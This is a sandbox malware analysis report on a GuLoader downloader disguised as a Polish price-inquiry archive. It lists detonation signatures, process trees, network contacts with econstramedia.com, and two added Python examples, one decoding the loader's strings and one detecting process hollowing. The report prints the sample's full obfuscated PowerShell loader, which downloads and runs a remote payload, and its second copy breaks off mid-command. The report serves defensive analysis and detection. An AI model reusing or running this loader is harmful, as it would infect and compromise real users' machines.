Malware Analysis Report

2024-10-18 23:07

Sample ID 240709-r6ptaazhrh
Target FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.7z
SHA256 7de13a9108d510ad39087daae6c4f2c0a23972f3760962b805a08ca4c79e0954
Tags
execution guloader downloader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7de13a9108d510ad39087daae6c4f2c0a23972f3760962b805a08ca4c79e0954

Threat Level: Known bad

The file FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.7z was found to be: Known bad.

Malicious Activity Summary

execution guloader downloader

Guloader, Cloudeye

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Program crash

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 14:48

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-09 14:48

Reported

2024-07-09 14:51

Platform

win7-20240705-en

Max time kernel

147s

Max time network

150s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target Count
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A 58

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. 
ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings 
'.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn 
z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
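Added example (not part of the report or of the sample): a Python re-implementation of the string decoder the captured PowerShell defines as Antikvitetsforretnings. The function reads every fifth character of its argument starting at offset 4 and stops one character short of the end, so each five-character group carries one payload character and four filler characters. Run against literals copied from the command line above, it recovers the dispatcher `iex` (so Unthrust is `. iex <fragment>`), the header name `User-Agent`, and the download URL on econstramedia.com, the domain in the Network table that follows. The longer literals in this report (the user-agent value, the `echo %appdata%\Coumarate.Bic` command) had runs of spaces collapsed when the page was rendered and no longer decode from the report text; decode them from the original .bat instead.

```python
import re

# Python equivalent of the report's Antikvitetsforretnings function. The
# PowerShell loop is: for ($i = 4; $i -lt $s.Length - 1; $i += 5) take
# $s.Substring($i, 1). Every fifth character carries payload, the four before
# it are filler, and the last character is never read. The Substring count is
# $Cabalismsbryderens, which is $null until
# `If (${host}.CurrentCulture) {$Cabalismsbryderens++}` makes it 1; a host
# with no CurrentCulture decodes everything to empty strings, a crude
# environment check that also defeats naive emulators.
def decode_stride(blob: str, start: int = 4, step: int = 5) -> str:
    """Return the payload characters hidden in a stride-encoded literal."""
    return blob[start:len(blob) - 1:step]


# Encoded literals copied verbatim from the powershell.exe command line in this
# report, keyed by the script's own variable names. Only literals whose
# whitespace survived rendering are included.
SAMPLES = {
    "Eksperter": "GuttiVirke,trexScor ",
    "Torumslejligheds": "BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ",
    "Udarte": "Hytt>Sony ",
    "nucleli": "Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ",
}


def decode_samples(samples=SAMPLES) -> dict:
    """Decode each named literal."""
    return {name: decode_stride(blob) for name, blob in samples.items()}


# Every decoder call in the captured script has the shape
#   Antikvitetsforretnings '<literal>'
# A doubled '' is PowerShell's escape for a quote inside a single-quoted string.
CALL_RE = re.compile(r"Antikvitetsforretnings\s+'((?:[^']|'')*)'")


def decode_script(cmdline: str) -> list:
    """Decode every stride-encoded argument in a captured command line, in order."""
    return [decode_stride(m.group(1).replace("''", "'"))
            for m in CALL_RE.finditer(cmdline)]


def extract_urls(decoded) -> list:
    """Keep the decoded fragments that look like download URLs."""
    return [s for s in decoded if re.match(r"https?://", s, re.IGNORECASE)]


if __name__ == "__main__":
    for name, value in decode_samples().items():
        print(f"{name:18} -> {value!r}")
```

Feed decode_script the full command line from the .bat (not the rendered copy) to obtain the whole plaintext skeleton in one pass; the first URL returned by extract_urls is the stage-two download location the 58 blocked requests above were trying to reach.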

Network

Country Destination Domain Proto Count
US 8.8.8.8:53 econstramedia.com udp 1
IN 103.211.216.55:443 econstramedia.com tcp 58

Files

memory/1156-4-0x000007FEF627E000-0x000007FEF627F000-memory.dmp

memory/1156-5-0x000000001B590000-0x000000001B872000-memory.dmp

memory/1156-6-0x00000000027E0000-0x00000000027E8000-memory.dmp

memory/1156-7-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/1156-8-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/1156-9-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/1156-10-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/1156-11-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

memory/1156-12-0x000007FEF627E000-0x000007FEF627F000-memory.dmp

memory/1156-13-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-09 14:48

Reported

2024-07-09 14:51

Platform

win10v2004-20240704-en

Max time kernel

149s

Max time network

155s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.bat"

Signatures

Guloader, Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1288 set thread context of 2236 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2224 wrote to memory of 2888 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 2888 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 4672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2888 wrote to memory of 4672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2888 wrote to memory of 1288 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1288 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1288 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 228 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1288 wrote to memory of 228 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1288 wrote to memory of 228 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1288 wrote to memory of 2236 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1288 wrote to memory of 2236 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1288 wrote to memory of 2236 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1288 wrote to memory of 2236 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1288 wrote to memory of 2236 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
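Added example (not part of the report): the PID pairs in the two tables above, correlated the way a detection rule would do it. A parent writes into every child it starts, so the WriteProcessMemory rows are noise on their own (cmd.exe 2224 into powershell.exe 2888, for instance). The signal is the pair 1288 -> 2236, where the SysWOW64 PowerShell both writes into wab.exe and sets its thread context, the observable half of CreateProcess(suspended) -> WriteProcessMemory -> SetThreadContext -> ResumeThread. The hop from the System32 PowerShell (2888) to its SysWOW64 build (1288) is what lets the loader place 32-bit code into the 32-bit wab.exe under Program Files (x86). The behavioral1 run on win7 above produced none of these rows. The rows are transcribed from this report; the rule names and thresholds are this example's own.

```python
import ntpath
import re
from collections import Counter

# Image paths exactly as they appear in the behavioral2 signature tables.
CMD64 = r"C:\Windows\system32\cmd.exe"
CMD32 = r"C:\Windows\SysWOW64\cmd.exe"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
WAB = r"C:\Program Files (x86)\windows mail\wab.exe"

# Rows transcribed from the WriteProcessMemory and SetThreadContext tables:
# (indicator, process, target, number of times the row is listed).
REPORT_ROWS = [
    ("PID 2224 wrote to memory of 2888", CMD64, PS64, 2),
    ("PID 2888 wrote to memory of 4672", PS64, CMD64, 2),
    ("PID 2888 wrote to memory of 1288", PS64, PS32, 3),
    ("PID 1288 wrote to memory of 228", PS32, CMD32, 3),
    ("PID 1288 wrote to memory of 2236", PS32, WAB, 5),
    ("PID 1288 set thread context of 2236", PS32, WAB, 1),
]
EVENTS = [(ind, proc, tgt) for ind, proc, tgt, n in REPORT_ROWS for _ in range(n)]

INDICATOR_RE = re.compile(r"PID (\d+) (wrote to memory of|set thread context of) (\d+)")


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def analyse(events):
    """Correlate memory writes with thread-context changes per (source, target) PID pair."""
    writes = Counter()
    set_ctx = set()
    image = {}
    for indicator, proc, target in events:
        m = INDICATOR_RE.match(indicator)
        if not m:
            continue
        src, action, dst = int(m.group(1)), m.group(2), int(m.group(3))
        image[src], image[dst] = proc, target
        if action.startswith("wrote"):
            writes[(src, dst)] += 1
        else:
            set_ctx.add((src, dst))

    findings = []
    # Writes plus SetThreadContext into a process whose image differs from the
    # writer's: the observable part of suspended-process hollowing.
    for src, dst in sorted(set_ctx):
        if writes[(src, dst)] and _name(image[src]) != _name(image[dst]):
            findings.append(("process_hollowing", src, dst, image[dst]))
    # A 64-bit PowerShell launching the SysWOW64 build of itself, the hop that
    # allows 32-bit code to be written into a 32-bit host process.
    for src, dst in sorted(writes):
        if (_name(image[src]) == _name(image[dst]) == "powershell.exe"
                and "\\system32\\" in image[src].lower()
                and "\\syswow64\\" in image[dst].lower()):
            findings.append(("x64_to_x86_powershell_hop", src, dst, image[dst]))
    return findings


if __name__ == "__main__":
    for finding in analyse(EVENTS):
        print(*finding)
```

The same correlation works on Sysmon event 8/10 or EDR API telemetry once the rows are mapped to (indicator, process, target) triples; requiring both the write and the context change on one pair keeps ordinary parent-to-child launches out of the result.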

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FV-452747284 INTERPLUS Zapytanie o cenę arbejdsmetodes.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. 
ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings 
